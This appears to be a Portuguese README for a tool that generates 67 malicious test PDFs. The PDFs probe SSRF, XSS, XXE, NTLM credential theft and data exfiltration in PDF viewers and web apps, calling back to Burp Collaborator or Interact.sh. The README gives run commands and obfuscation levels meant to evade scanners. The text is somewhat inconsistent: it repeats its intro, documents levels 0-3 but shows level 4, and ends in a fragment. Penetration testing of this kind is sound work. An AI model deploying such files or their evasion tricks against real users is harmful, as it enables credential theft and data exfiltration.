
Gere arquivos PDF maliciosos para testes de penetração, bug bounty e red teaming. Testa SSRF, XSS, XXE, roubo de credenciais NTLM e exfiltração de dados em visualizadores de PDF, conversores e aplicações web. Integra-se com Burp Collaborator e Interact.sh.

Gere 67 arquivos de teste PDF maliciosos para testar callbacks de phone-home, SSRF, XSS, XXE, roubo de credenciais NTLM e exfiltração de dados em visualizadores de PDF, conversores e aplicações web. Pode ser usado com Burp Collaborator ou Interact.sh
Usado para testes de penetração, caça a bug bounty e/ou red team etc. Criei esta ferramenta porque precisava de uma ferramenta para gerar vários arquivos PDF com diversos links. Apenas para fins educacionais e profissionais.
pip install -r requirements.txt python3 malicious-pdf.py burp-collaborator-url
A saída será gravada no diretório `output/` como: test1.pdf, test2.pdf, test3.pdf etc.
### Opções```
--output-dir DIR Directory to save generated PDF files (default: output/)
--no-credit Do not embed credit/attribution metadata in generated PDFs
--obfuscate LEVEL Obfuscation level (0-3):
0 = None (default)
1 = PDF name hex encoding + string octal/hex encoding
2 = Level 1 + JS bracket notation + javascript: URI case/whitespace obfuscation
3 = Level 2 + FlateDecode stream compression
Exemplo com ofuscação:``` python3 malicious-pdf.py https://your-interact-sh-url --obfuscate 2
Ofuscação máxima (o Nível 4 envolve payloads JS em um stub de decodificador base64 para que as chamadas de API originais nunca apareçam como substrings literais):```
python3 malicious-pdf.py https://your-interact-sh-url --obfuscate 4
/V, decodificador base64) derrotam scanners ingênuos de regex /JS